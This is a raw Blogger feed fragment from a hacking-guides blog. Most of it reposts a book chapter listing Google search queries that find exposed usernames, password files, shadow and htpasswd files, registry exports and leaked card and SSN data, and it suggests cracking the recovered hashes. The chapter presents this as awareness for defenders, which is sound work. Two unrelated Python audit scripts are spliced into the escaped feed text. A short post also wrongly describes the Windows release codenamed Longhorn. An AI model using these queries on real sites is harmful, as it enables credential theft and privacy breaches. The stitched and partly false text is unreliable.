The next release of Windows &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_60"&gt;XP&lt;/span&gt;, codenamed Longhorn, is due out late dis month The next big release is codenamed &lt;span class="blsp-spelling-error" id="SPELLING_ERROR_61"&gt;Blackcomb&lt;/span&gt; and will be out in 2010/2011&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2811100680510495731-1338184101149311724?l=hacking-guides.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hacking-guides.blogspot.com/feeds/1338184101149311724/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2811100680510495731&amp;postID=1338184101149311724' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1338184101149311724'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2811100680510495731/posts/default/1338184101149311724'/><link rel='alternate' type='text/html' href='http://hacking-guides.blogspot.com/2007/12/20-things-you-didnt-knew-about-xp.html' title='20 things you didn&apos;t knew about xp'/><author><name>ekansh</name><uri>http://www.blogger.com/profile/09203979474549210138</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2811100680510495731.post-439764695528263456</id><published>2007-12-09T02:28:00.000-08:00</published><updated>2007-12-09T02:44:33.597-08:00</updated><title type='text'>HAcking google for finding passwords and other personal info</title><content type='html'>Introduction&lt;br /&gt;This is not about finding sensitive data during an assessment as much as&lt;br /&gt;it is about 
what the “bad guys” might do to troll for the data.The examples presented&lt;br /&gt;generally represent the lowest-hanging fruit on the security&lt;br /&gt;tree. Hackers target this information on a daily basis.To protect against this type&lt;br /&gt;of attacker, we need to be fairly candid about the worst-case possibilities.We&lt;br /&gt;won’t be overly candid, however.&lt;br /&gt;We start by looking at some queries that can be used to uncover usernames,&lt;br /&gt;the less important half of most authentication systems.The value of a username is&lt;br /&gt;often overlooked, but, an entire multimilliondollar&lt;br /&gt;security system can be shattered through skillful crafting of even the&lt;br /&gt;smallest, most innocuous bit of information.&lt;br /&gt;Next, we take a look at queries that are designed to uncover passwords. Some&lt;br /&gt;of the queries we look at reveal encrypted or encoded passwords, which will take&lt;br /&gt;a bit of work on the part of an attacker to use to his or her advantage.We also&lt;br /&gt;take a look at queries that can uncover cleartext passwords.These queries are some&lt;br /&gt;of the most dangerous in the hands of even the most novice attacker. What could&lt;br /&gt;make an attack easier than handing a username and cleartext password to an&lt;br /&gt;attacker?&lt;br /&gt;We wrap up by discussing the very real possibility of uncovering&lt;br /&gt;highly sensitive data such as credit card information and information used to&lt;br /&gt;commit identity theft, such as Social Security numbers. Our goal here is to&lt;br /&gt;explore ways of protecting against this very real threat.To that end, we don’t go&lt;br /&gt;into details about uncovering financial information and the like. 
If you’re a “dark&lt;br /&gt;side” hacker, you’ll need to figure these things out on your own.&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;strong&gt;Searching for Usernames&lt;/strong&gt;&lt;br /&gt;&lt;/span&gt;Most authentication mechanisms use a username and password to protect information.&lt;br /&gt;To get through the “front door” of this type of protection, you’ll need to&lt;br /&gt;determine usernames as well as passwords. Usernames also can be used for social&lt;br /&gt;engineering efforts, as we discussed earlier.&lt;br /&gt;Many methods can be used to determine usernames. In Chapter 10, we&lt;br /&gt;explored ways of gathering usernames via database error messages. In Chapter 8&lt;br /&gt;we explored Web server and application error messages that can reveal various&lt;br /&gt;information, including usernames.These indirect methods of locating usernames&lt;br /&gt;are helpful, but an attacker could target a usernames directory&lt;br /&gt;query like “your username is”. This phrase can locate help pages that describe the&lt;br /&gt;username creation process,&lt;br /&gt;information gleaned from other sources, such as Google Groups posts or phone&lt;br /&gt;listings.The usernames could then be recycled into various other phases of the&lt;br /&gt;attack, such as a worm-based spam campaign or a social-engineering attempt.An&lt;br /&gt;attacker can gather usernames from a variety of sources, as shown in the sample&lt;br /&gt;queries listed&lt;br /&gt;Sample Queries That Locate Usernames&lt;br /&gt;Query Description&lt;br /&gt;inurl:admin inurl:userlist Generic userlist files&lt;br /&gt;inurl:admin filetype:asp Generic userlist files&lt;br /&gt;inurl:userlist&lt;br /&gt;inurl:php inurl:hlstats intext: Half-life statistics file, lists username and&lt;br /&gt;Server Username other information&lt;br /&gt;filetype:ctl inurl:haccess. 
Microsoft FrontPage equivalent of htaccess&lt;br /&gt;ctl Basic shows Web user credentials&lt;br /&gt;Query Description&lt;br /&gt;filetype:reg reg intext: Microsoft Internet Account Manager can&lt;br /&gt;”internet account manager” reveal usernames and more&lt;br /&gt;filetype:wab wab Microsoft Outlook Express Mail address&lt;br /&gt;books&lt;br /&gt;filetype:mdb inurl:profiles Microsoft Access databases containing (user)&lt;br /&gt;profiles.&lt;br /&gt;index.of perform.ini mIRC IRC ini file can list IRC usernames and&lt;br /&gt;other information&lt;br /&gt;inurl:root.asp?acs=anon Outlook Mail Web Access directory can be&lt;br /&gt;used to discover usernames&lt;br /&gt;filetype:conf inurl:proftpd. PROFTP FTP server configuration file reveals&lt;br /&gt;conf –sample username and server information&lt;br /&gt;filetype:log username putty PUTTY SSH client logs can reveal usernames&lt;br /&gt;and server information&lt;br /&gt;filetype:rdp rdp Remote Desktop Connection files reveal user&lt;br /&gt;credentials&lt;br /&gt;intitle:index.of .bash_history UNIX bash shell history reveals commands&lt;br /&gt;typed at a bash command prompt; usernames&lt;br /&gt;are often typed as argument strings&lt;br /&gt;intitle:index.of .sh_history UNIX shell history reveals commands typed at&lt;br /&gt;a shell command prompt; usernames are&lt;br /&gt;often typed as argument strings&lt;br /&gt;“index of ” lck Various lock files list the user currently using&lt;br /&gt;a file&lt;br /&gt;+intext:webalizer +intext: Webalizer Web statistics page lists Web user-&lt;br /&gt;Total Usernames +intext: names and statistical information&lt;br /&gt;”Usage Statistics for”&lt;br /&gt;filetype:reg reg HKEY_ Windows Registry exports can reveal&lt;br /&gt;CURRENT_USER username usernames and other information&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Underground Googling&lt;br /&gt;&lt;span style="font-size:130%;"&gt;Searching for a Known Filename&lt;/span&gt;&lt;br /&gt;&lt;/strong&gt;Remember that there are 
several ways to search for a known filename.&lt;br /&gt;One way relies on locating the file in a directory listing, like intitle:index.of install.log. Another, often better, method relies on the filetype operator, as in filetype:log inurl:install.log. Directory listings are not all that common. Google will crawl a link to a file in a directory listing, meaning that the filetype method will find both directory listing entries as well as files crawled in other ways.&lt;br /&gt;&lt;br /&gt;In some cases, usernames can be gathered from Web-based statistical programs that check Web activity. The Webalizer program shows all sorts of information about a Web server’s usage. Output files for the Webalizer program can be located with a query such as intext:webalizer intext:”Total Usernames” intext:”Usage Statistics for”. Among the information displayed is the username that was used to connect to the Web server, as shown in Figure 9.2. 
In some cases, however, the usernames displayed are not valid or current, but the “Visits” column lists the number of times a user account was used during the capture period. This enables an attacker to easily determine which accounts are more likely to be valid.&lt;br /&gt;&lt;br /&gt;The Windows registry holds all sorts of authentication information, including usernames and passwords. Though it is unlikely (and fairly uncommon) to locate live, exported Windows registry files on the Web, at the time of this writing there are nearly 100 hits on the query filetype:reg HKEY_CURRENT_USER username, which locates Windows registry files that contain the word username and in some cases passwords.&lt;br /&gt;&lt;br /&gt;As any talented attacker or security person will tell you, it’s rare to get information served to you on a silver platter. Most decent finds take a bit of persistence, creativity, intelligence, and just a bit of good luck. For example, consider the Microsoft Outlook Web Access portal, which can be located with a query like inurl:root.asp?acs=anon. At the time of this writing, fewer than 50 sites are returned by this query, even though there are certainly more than 50 sites running the Microsoft Web-based mail portal. Regardless of how you might locate a site running this e-mail gateway, it’s not uncommon for the site to host a public directory (denoted “Find Names,” by default).&lt;br /&gt;&lt;br /&gt;The public directory allows access to a search page that can be used to find users by name. In most cases, wildcard searching is not allowed, meaning that a search for * will not return a list of all users, as might be expected. 
Entering a&lt;br /&gt;search for a space is an interesting idea, since most user descriptions contain a&lt;br /&gt;space, but most large directories will return the error message “This query would&lt;br /&gt;return too many addresses!” Applying a bit of creativity, an attacker could begin&lt;br /&gt;searching for individual common letters, such as the “Wheel of Fortune letters”&lt;br /&gt;R, S,T, L, N, and E. Eventually one of these searches will most likely reveal a list&lt;br /&gt;of user information like&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Once a list of user information is returned, the attacker can then recycle the&lt;br /&gt;search with words contained in the user list, searching for the words Voyager,&lt;br /&gt;Freshmen, or Campus, for example.Those results can then be recycled, eventually&lt;br /&gt;resulting in a nearly complete list of user information.&lt;br /&gt;&lt;strong&gt;&lt;span style="font-size:130%;"&gt;Searching for Passwords&lt;br /&gt;&lt;/span&gt;&lt;/strong&gt;Password data, one of the “Holy Grails” during a penetration test, should be protected.&lt;br /&gt;Unfortunately, many examples of Google queries can be used to locate&lt;br /&gt;passwords on the Web, as shown in Table 9.2.&lt;br /&gt;Table 9.2 Queries That Locate Password Information&lt;br /&gt;Query Description&lt;br /&gt;inurl:/db/main.mdb ASP-Nuke passwords&lt;br /&gt;filetype:cfm “cfapplication ColdFusion source with potential passwords&lt;br /&gt;name” password&lt;br /&gt;filetype:pass pass intext:userid dbman credentials&lt;br /&gt;allinurl:auth_user_file.txt DCForum user passwords&lt;br /&gt;eggdrop filetype:user user Eggdrop IRC user credentials&lt;br /&gt;filetype:ini inurl:flashFXP.ini FlashFXP FTP credentials&lt;br /&gt;filetype:url +inurl:”ftp://” FTP bookmarks cleartext passwords&lt;br /&gt;+inurl:”@”&lt;br /&gt;inurl:zebra.conf intext: GNU Zebra passwords&lt;br /&gt;password -sample -test&lt;br /&gt;-tutorial –download&lt;br /&gt;filetype:htpasswd htpasswd HTTP htpasswd 
Web user credentials&lt;br /&gt;intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials&lt;br /&gt;“htgroup” -intitle:”dist”&lt;br /&gt;-apache -htpasswd.c&lt;br /&gt;intitle:”Index of” “.htpasswd” HTTP htpasswd Web user credentials&lt;br /&gt;htpasswd.bak&lt;br /&gt;“http://*:*@www” bob:bob HTTP passwords (bob is a sample username)&lt;br /&gt;“sets mode: +k” IRC channel keys (passwords)&lt;br /&gt;“Your password is * Remember IRC NickServ registration passwords&lt;br /&gt;this for later use”&lt;br /&gt;signin filetype:url JavaScript authentication credentials&lt;br /&gt;&lt;br /&gt;Queries That Locate Password Information&lt;br /&gt;Query Description&lt;br /&gt;LeapFTP intitle:”index.of./” LeapFTP client login credentials&lt;br /&gt;sites.ini modified&lt;br /&gt;inurl:lilo.conf filetype:conf LILO passwords&lt;br /&gt;password -tatercounter2000&lt;br /&gt;-bootpwd –man&lt;br /&gt;filetype:config config intext: Microsoft .NET application credentials&lt;br /&gt;appSettings “User ID”&lt;br /&gt;filetype:pwd service Microsoft FrontPage Service Web passwords&lt;br /&gt;intitle:index.of Microsoft FrontPage Web credentials&lt;br /&gt;administrators.pwd&lt;br /&gt;“# -FrontPage-” inurl:service.pwd Microsoft FrontPage Web passwords&lt;br /&gt;ext:pwd inurl:_vti_pvt inurl: Microsoft FrontPage Web passwords&lt;br /&gt;(Service  authors  administrators)&lt;br /&gt;inurl:perform filetype:ini mIRC nickserv credentials&lt;br /&gt;intitle:”index of” intext: mySQL database credentials&lt;br /&gt;connect.inc&lt;br /&gt;intitle:”index of” intext: mySQL database credentials&lt;br /&gt;globals.inc&lt;br /&gt;filetype:conf oekakibbs Oekakibss user passwords&lt;br /&gt;filetype:dat wand.dat Opera‚ ÄúMagic Wand‚Äù Web credentials&lt;br /&gt;inurl:ospfd.conf intext: OSPF Daemon Passwords&lt;br /&gt;password -sample -test&lt;br /&gt;-tutorial –download&lt;br /&gt;index.of passlist Passlist user credentials&lt;br /&gt;inurl:passlist.txt passlist.txt file user credentials&lt;br 
/&gt;filetype:dat “password.dat” password.dat files&lt;br /&gt;inurl:password.log filetype:log password.log file reveals usernames, passwords,&lt;br /&gt;and hostnames&lt;br /&gt;filetype:log inurl:”password.log” password.log files cleartext passwords&lt;br /&gt;inurl:people.lst filetype:lst People.lst generic password file&lt;br /&gt;intitle:index.of config.php PHP Configuration File database credentials&lt;br /&gt;inurl:config.php dbuname dbpass PHP Configuration File database credentials&lt;br /&gt;inurl:nuke filetype:sql PHP-Nuke credentials&lt;br /&gt;Queries That Locate Password Information&lt;br /&gt;Query Description&lt;br /&gt;filetype:conf inurl:psybnc.conf psyBNC IRC user credentials&lt;br /&gt;“USER.PASS=”&lt;br /&gt;filetype:ini ServUDaemon servU FTP Daemon credentials&lt;br /&gt;filetype:conf slapd.conf slapd configuration files root password&lt;br /&gt;inurl:”slapd.conf” intext: slapd LDAP credentials&lt;br /&gt;”credentials” -manpage&lt;br /&gt;-”Manual Page” -man: -sample&lt;br /&gt;inurl:”slapd.conf” intext: slapd LDAP root password&lt;br /&gt;”rootpw” -manpage&lt;br /&gt;-”Manual Page” -man: -sample&lt;br /&gt;filetype:sql “IDENTIFIED BY” –cvs SQL passwords&lt;br /&gt;filetype:sql password SQL passwords&lt;br /&gt;filetype:ini wcx_ftp Total Commander FTP passwords&lt;br /&gt;filetype:netrc password UNIX .netrc user credentials&lt;br /&gt;index.of.etc UNIX /etc directories contain various credential&lt;br /&gt;files&lt;br /&gt;intitle:”Index of..etc” passwd UNIX /etc/passwd user credentials&lt;br /&gt;intitle:index.of passwd UNIX /etc/passwd user credentials&lt;br /&gt;passwd.bak&lt;br /&gt;intitle:”Index of” pwd.db UNIX /etc/pwd.db credentials&lt;br /&gt;intitle:Index.of etc shadow UNIX /etc/shadow user credentials&lt;br /&gt;intitle:index.of master.passwd UNIX master.passwd user credentials&lt;br /&gt;intitle:”Index of” spwd.db UNIX spwd.db credentials&lt;br /&gt;passwd -pam.conf&lt;br /&gt;filetype:bak inurl:”htaccess UNIX various password file 
backups&lt;br /&gt;passwdshadowhtusers&lt;br /&gt;filetype:inc dbconn Various database credentials&lt;br /&gt;filetype:inc intext:mysql_ Various database credentials, server names&lt;br /&gt;connect&lt;br /&gt;filetype:properties inurl:db Various database credentials, server names&lt;br /&gt;intext:password&lt;br /&gt;inurl:vtund.conf intext:pass –cvs Virtual Tunnel Daemon passwords&lt;br /&gt;inurl:”wvdial.conf” intext: wdial dialup user credentials&lt;br /&gt;&lt;br /&gt;Queries That Locate Password Information&lt;br /&gt;Query Description&lt;br /&gt;filetype:mdb wwforum Web Wiz Forums Web credentials&lt;br /&gt;“AutoCreate=TRUE password=*”Website Access Analyzer user passwords&lt;br /&gt;filetype:pwl pwl Windows Password List user credentials&lt;br /&gt;filetype:reg reg +intext: Windows Registry Keys containing user&lt;br /&gt;”defaultusername” intext: credentials&lt;br /&gt;”defaultpassword”&lt;br /&gt;filetype:reg reg +intext: Windows Registry Keys containing user&lt;br /&gt;”internet account manager” credentials&lt;br /&gt;“index of/” “ws_ftp.ini” WS_FTP FTP credentials&lt;br /&gt;“parent directory”&lt;br /&gt;filetype:ini ws_ftp pwd WS_FTP FTP user credentials&lt;br /&gt;inurl:/wwwboard wwwboard user credentials&lt;br /&gt;In most cases, passwords discovered on the Web are either encrypted or&lt;br /&gt;encoded in some way. In most cases, these passwords can be fed into a password&lt;br /&gt;cracker such as John the Ripper from www.openwall.com/john to produce&lt;br /&gt;plaintext passwords that can be used in an attack. Figure 9.6 shows the results of&lt;br /&gt;the search ext:pwd inurl:_vti_pvt inurl:(Service  authors  administrators), which&lt;br /&gt;combines a search for some common&lt;br /&gt;&lt;br /&gt;Exported Windows registry files often contain encrypted or encoded passwords&lt;br /&gt;as well. 
If a user exports the Windows registry to a file and Google subsequently crawls that file, a query like filetype:reg intext:”internet account manager” could reveal interesting keys containing password data. Note that live, exported Windows registry files are not very common, but it’s not uncommon for an attacker to target a site simply because of one exceptionally insecure file. It’s also possible for a Google query to uncover cleartext passwords. These passwords can be used as is without having to employ a password-cracking utility. In these extreme cases, the only challenge is determining the username as well as the host on which the password can be used. As shown in Figure 9.8, certain queries will locate all the following information: usernames, cleartext passwords, and the host that uses that authentication!&lt;br /&gt;&lt;br /&gt;There is no magic query for locating passwords, but during an assessment, remember that the simplest queries directed at a site can have amazing results, as we discussed in Chapter 7, Ten Simple Searches. For example, a query like “Your password” forgot would locate pages that provide a forgotten password recovery mechanism. The information from this type of query can be used to formulate any of a number of attacks against a password. 
As always, effective social engineering is a terrific nontechnical solution to “forgotten” passwords.&lt;br /&gt;&lt;br /&gt;Another generic search for password information, intext:(password  passcode  pass) intext:(username  userid  user), combines common words for passwords and user IDs into one query. This query returns a lot of results, but the vast majority of the top hits refer to pages that list forgotten password information, including either links or contact information. Using Google’s translate feature, found at http://translate.google.com/translate_t, we could also create multilingual password searches. Table 9.3 lists common translations for the word password.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Table 9.3 English Translations of the Word Password&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;Language Word Translation&lt;/strong&gt;&lt;br /&gt;German password Kennwort&lt;br /&gt;Spanish password contraseña&lt;br /&gt;French password mot de passe&lt;br /&gt;Italian password parola d’accesso&lt;br /&gt;Portuguese password senha&lt;br /&gt;Dutch password Paswoord&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;NOTE&lt;/strong&gt;&lt;br /&gt;The terms username and userid in most languages translate to username and userid, respectively.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Searching for Credit Card Numbers, Social Security Numbers, and More&lt;/strong&gt;&lt;br /&gt;Most people have heard news stories about Web hackers making off with customer credit card information. With so many fly-by-night retailers popping up on the Internet, it’s no wonder that credit card fraud is so prolific. These mom-and-pop retailers are not the only ones successfully compromised by hackers. Corporate giants by the hundreds have had financial database compromises over the years, victims of sometimes very technical, highly focused attackers. 
What might surprise you is that it doesn’t take a rocket scientist to uncover live credit card numbers on the Internet, thanks to search engines like Google. Everything from credit information to banking data or supersensitive classified government documents can be found on the Web. Consider the (highly edited) Web page shown in Figure 9.9.&lt;br /&gt;&lt;br /&gt;This document, found using Google, lists hundreds and hundreds of credit card numbers (including expiration date and card validation numbers) as well as the owners’ names, addresses, and phone numbers. This particular document also included phone card (calling card) numbers. Notice the scroll bar on the right-hand side of Figure 9.9, an indicator that the displayed page is only a small part of this huge document—like many other documents of its kind. In most cases, pages that contain these numbers are not “leaked” from online retailers or e-commerce sites but rather are most likely the fruits of a scam known as phishing, in which users are solicited via telephone or e-mail for personal information. Several Web sites, including MillerSmiles.co.uk, document these scams and hoaxes. Figure 9.10 shows a screen shot of a popular eBay phishing scam that encourages users to update their eBay profile information.&lt;br /&gt;&lt;br /&gt;Once a user fills out this form, all the information is sent via e-mail to the attacker, who can use it for just about anything.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Tools and Traps&lt;br /&gt;Catching Online Scammers&lt;/strong&gt;&lt;br /&gt;In some cases, you might be able to use Google to help nab the bad guys. Phishing scams are effective because the fake page looks like an official page. 
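&lt;br /&gt;&lt;br /&gt;The sidebar goes on to describe tracing a phishing page’s text back to the legitimate sites it was copied from, then asking those companies for the one client that visited all of them. That log-correlation step, as an added example (not code from the book or this blog): it parses Apache combined-format access logs and intersects the client addresses that fetched the copied page on every server. The hostnames, page paths, addresses and log lines are all constructed.&lt;br /&gt;

```python
"""Correlate one client address across several companies' Web server logs.

Added example, not code from the book or this blog. The sidebar describes
finding which legitimate sites a phishing page was copied from, then asking
those companies to look for a client that visited all of them. This does the
log side of that: it parses Apache "combined" format lines and intersects the
client addresses that fetched the copied page on every server.
All hostnames, paths, addresses and log lines below are constructed.
"""
import re
from datetime import datetime
from typing import Dict, Iterable, List, Set, Tuple

# Apache combined log format:
#   host ident user [time] "method path protocol" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample logs: one company per key, each value the text of its access log.
SAMPLE_LOGS: Dict[str, str] = {
    "acme-bank.example": (
        '203.0.113.7 - - [12/Mar/2005:10:01:22 +0000] "GET /account/update.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"\n'
        '198.51.100.20 - - [12/Mar/2005:10:02:01 +0000] "GET /index.html HTTP/1.1" 200 812 "-" "Mozilla/4.0"\n'
        '198.51.100.21 - - [12/Mar/2005:10:03:15 +0000] "GET /account/update.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"\n'
    ),
    "shop.example": (
        '203.0.113.7 - - [12/Mar/2005:10:07:40 +0000] "GET /help/verify.html HTTP/1.1" 200 2210 "-" "Mozilla/4.0"\n'
        '198.51.100.21 - - [12/Mar/2005:11:15:03 +0000] "GET /help/verify.html HTTP/1.1" 200 2210 "-" "Mozilla/4.0"\n'
        'this line is not in combined format and is skipped\n'
    ),
    "auction.example": (
        '203.0.113.7 - - [12/Mar/2005:10:12:05 +0000] "GET /profile/edit.html HTTP/1.1" 200 3300 "-" "Mozilla/4.0"\n'
        '198.51.100.22 - - [12/Mar/2005:12:00:00 +0000] "GET /profile/edit.html HTTP/1.1" 200 3300 "-" "Mozilla/4.0"\n'
    ),
}

# Which page on each site the phishing page's text was traced back to
# (the Google-query step of the sidebar; here simply assumed to be known).
COPIED_PAGES: Dict[str, List[str]] = {
    "acme-bank.example": ["/account/update.html"],
    "shop.example": ["/help/verify.html"],
    "auction.example": ["/profile/edit.html"],
}


def parse_combined_log(text: str) -> List[dict]:
    """Parse combined-format lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["time"] = datetime.strptime(rec["time"], "%d/%b/%Y:%H:%M:%S %z")
        records.append(rec)
    return records


def clients_that_fetched(records: Iterable[dict], paths: Iterable[str]) -> Set[str]:
    """Client addresses that requested any of the given paths."""
    wanted = set(paths)
    return {r["ip"] for r in records if r["path"] in wanted}


def correlate_visitors(logs: Dict[str, str],
                       copied_pages: Dict[str, List[str]]) -> Set[str]:
    """Addresses that fetched the copied page on every company's server."""
    common: Set[str] = set()
    for i, (company, text) in enumerate(logs.items()):
        ips = clients_that_fetched(parse_combined_log(text), copied_pages[company])
        common = ips if i == 0 else common & ips
    return common


def visit_timeline(logs: Dict[str, str], copied_pages: Dict[str, List[str]],
                   ip: str) -> List[Tuple[datetime, str, str]]:
    """Time-ordered (time, company, path) hits by one address, for the IR handoff."""
    hits = []
    for company, text in logs.items():
        wanted = set(copied_pages[company])
        for r in parse_combined_log(text):
            if r["ip"] == ip and r["path"] in wanted:
                hits.append((r["time"], company, r["path"]))
    return sorted(hits)


if __name__ == "__main__":
    for addr in sorted(correlate_visitors(SAMPLE_LOGS, COPIED_PAGES)):
        print(f"{addr} fetched the copied page on every site:")
        for when, company, path in visit_timeline(SAMPLE_LOGS, COPIED_PAGES, addr):
            print(f"  {when:%Y-%m-%d %H:%M:%S} {company}{path}")
```

Shared proxies and NAT mean an address present in every log is a lead for the responders, not proof; the time-ordered hits per address are what gets handed over.&lt;br /&gt;&lt;br /&gt;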
To create an official-looking page, the bad guys must have examples to work from, meaning that they must have visited a few legitimate companies’ Web sites. If the phishing scam was created using text from several companies’ existing pages, you can key in on specific phrases from the fake page, creating Google queries designed to round up the servers that hosted some of the original content. Once you’ve located the servers that contained the pilfered text, you can work with the companies involved to extract correlating connection data from their log files. If the scammer visited each company’s Web page, collecting bits of realistic text, his IP should appear in each of the log files. Auditors at SensePost (www.sensepost.com) have successfully used this technique to nab online scam artists. Unfortunately, if the scammer uses an exact copy of a page from only one company, this task becomes much more difficult to accomplish.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Social Security Numbers&lt;/strong&gt;&lt;br /&gt;Social Security numbers (SSNs) and other sensitive data can be easily located with Google as well as via the same techniques used to locate credit card numbers. For a variety of reasons, SSNs might appear online—for example, educational facilities are notorious for using an SSN as a student ID, then posting grades to a public Web site with the “student ID” displayed next to the grade. A creative attacker can do quite a bit with just an SSN, but in many cases it helps to also have a name associated with that SSN. Again, educational facilities have been found exposing this information via Excel spreadsheets listing students’ names, grades, and SSNs, despite the fact that the student ID number is often used to help protect the privacy of the student! 
Although we don’t feel it’s right to go into the details of how this data is located, several media outlets have irresponsibly posted the details online. Although the blame lies with the sites that are leaking this information, in our opinion it’s still not right to draw attention to how exactly the information can be located.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Personal Financial Data&lt;/strong&gt;&lt;br /&gt;In some cases, phishing scams are responsible for publicizing personal information; in other cases, hackers attacking online retailers are to blame for this breach of privacy. Sadly, there are many instances where an individual is personally responsible for his own lack of privacy. Such is the case with personal financial information. With the explosion of personal computers in today’s society, users have literally hundreds of personal finance programs to choose from. Many of these programs create data files with specific file extensions that can be searched with Google. It’s hard to imagine why anyone would post personal financial information to a public Web site (which subsequently gets crawled by Google), but it must happen quite a bit, judging by the number of hits for program files generated by Quicken and Microsoft Money, for example. Although it would be somewhat irresponsible to provide queries here that would unearth personal financial data, it’s important to understand the types of data that could potentially be uncovered by an attacker. To that end, Table 9.4 shows file extensions for various financial, accounting, and tax return programs. 
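&lt;br /&gt;&lt;br /&gt;A way to check your own Web root for those files, as an added example (not code from the book or this blog): it walks a directory looking for the Table 9.4 extensions and for the credential and history file names from the earlier query tables, and flags anything outside an allowlist of served types. The allowlist and the sample tree it builds are assumptions, constructed for the example.&lt;br /&gt;

```python
"""Audit a Web root for the financial data files and credential files this
chapter lists, and for anything outside the server's served-type allowlist.

Added example, not code from the book or this blog. The extension set is
Table 9.4; the credential and history file names come from the username and
password query tables earlier on the page; the allowlist of what this
particular server is meant to serve is an assumption.
"""
import os
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple, Union

# Table 9.4: personal finance, accounting and tax return program data files.
FINANCIAL_EXTENSIONS = {
    "afm", "ab4", "mmw", "iqd", "et2", "tax", "mny", "mbf", "inv", "ptdb",
    "qbb", "qdf", "soa", "sdb", "stx", "tmd", "tls", "fec", "wow",
} | {f"t{year:02d}" for year in (98, 99, 0, 1, 2, 3, 4)}  # Kiplinger t98..t04

# Credential, history and configuration files named in the query tables.
SENSITIVE_NAMES = {
    ".htpasswd", ".htaccess", "htpasswd.bak", "service.pwd", "authors.pwd",
    "administrators.pwd", ".bash_history", ".sh_history", ".netrc", "passwd",
    "passwd.bak", "shadow", "master.passwd", "ws_ftp.ini", "config.php",
    "slapd.conf", "password.log", "john.pot", "wand.dat", "perform.ini",
}

# Assumed allowlist: anything else should not be reachable through the server.
SERVED_EXTENSIONS = {"html", "htm", "css", "js", "png", "jpg", "gif", "pdf"}


def classify(path: Union[str, Path]) -> Optional[str]:
    """Return why a file should not be on the Web root, or None if it is fine."""
    path = Path(path)
    name = path.name.lower()
    ext = path.suffix.lower().lstrip(".")      # '' for dotfiles such as .htpasswd
    if name in SENSITIVE_NAMES:
        return "credential, history or configuration file"
    if ext in FINANCIAL_EXTENSIONS:
        return f"financial data file (.{ext})"
    if ext == "bak" or name.endswith("~"):
        return "backup copy (editor or admin leftover)"
    if ext not in SERVED_EXTENSIONS:
        return f"extension .{ext} is not on the served-type allowlist"
    return None


def audit_webroot(root: str) -> List[Tuple[str, str]]:
    """Walk the root and return sorted (relative path, reason) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            p = Path(dirpath, fname)
            reason = classify(p)
            if reason:
                findings.append((p.relative_to(root).as_posix(), reason))
    return sorted(findings)


def build_sample_webroot(root: str) -> None:
    """Constructed sample tree: legitimate content mixed with leaked files."""
    for rel in ("index.html", "css/site.css", "img/logo.png", "reports/q1.pdf",
                "reports/budget.qdf", "reports/2004.mny", "staff/.htpasswd",
                "staff/grades.xls", "backup/config.php.bak", "dev/.bash_history"):
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_text("constructed sample content\n")


def demo_audit() -> List[Tuple[str, str]]:
    """Build the sample tree in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_webroot(root)
        return audit_webroot(root)


if __name__ == "__main__":
    for rel, reason in demo_audit():
        print(f"{rel:28} {reason}")
```

Point audit_webroot at the document root itself; whatever it reports is either removed or blocked at the server, which is the allow-only-known-types approach the Summary recommends.&lt;br /&gt;&lt;br /&gt;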
Ensure that these filetypes aren’t listed on a webserver you’re charged with protecting.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Table 9.4 File Extensions for Financial, Accounting, and Tax Return Programs&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;File Extension Description&lt;/strong&gt;&lt;br /&gt;afm Abassis Finance Manager&lt;br /&gt;ab4 Accounting and Business File&lt;br /&gt;mmw AceMoney File&lt;br /&gt;Iqd AmeriCalc Mutual Fund Tax Report&lt;br /&gt;et2 Electronic Tax Return Security File (Australia)&lt;br /&gt;tax Intuit TurboTax Tax Return&lt;br /&gt;t98-t04 Kiplinger Tax Cut File (extension based on two-digit return year)&lt;br /&gt;mny Microsoft Money 2004 Money Data Files&lt;br /&gt;mbf Microsoft Money Backup Files&lt;br /&gt;inv MSN Money Investor File&lt;br /&gt;ptdb Peachtree Accounting Database&lt;br /&gt;qbb QuickBooks Backup Files reveal financial data&lt;br /&gt;qdf Quicken personal finance data&lt;br /&gt;soa Sage MAS 90 accounting software&lt;br /&gt;sdb Simply Accounting&lt;br /&gt;stx Simply Tax Form&lt;br /&gt;tmd Time and Expense Tracking&lt;br /&gt;tls Timeless Time &amp;amp; Expense&lt;br /&gt;fec U.S. Federal Campaign Expense Submission&lt;br /&gt;wow Wings Accounting File&lt;br 